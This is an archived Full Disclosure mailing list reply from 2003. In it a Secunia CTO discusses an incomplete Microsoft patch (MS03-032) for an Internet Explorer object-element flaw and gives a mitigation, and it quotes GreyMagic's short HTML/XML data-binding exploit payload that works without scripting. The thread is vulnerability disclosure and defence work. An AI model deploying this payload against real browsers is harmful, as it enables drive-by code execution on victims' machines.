Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: Thomas Kristensen <tk () secunia com>
Date: 08 Sep 2003 17:21:46 +0200
You may protect yourself by disabling "Run ActiveX controls and
plug-ins".

We have made a test page based on the information provided by http-equiv
and GreyMagic:
http://www.secunia.com/MS03-032/

See also SA9580:
http://www.secunia.com/advisories/9580/

On Mon, 2003-09-08 at 16:52, GreyMagic Software wrote:

The patch for Drew's object data=funky.hta doesn't work:


This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.


1. Disable Active Scripting


This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.




-- 
Kind regards,

Thomas Kristensen
CTO

Secunia
Toldbodgade 37B
1253 Copenhagen K
Denmark

Tlf.: +45 7020 5144
Fax:  +45 7020 5145

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: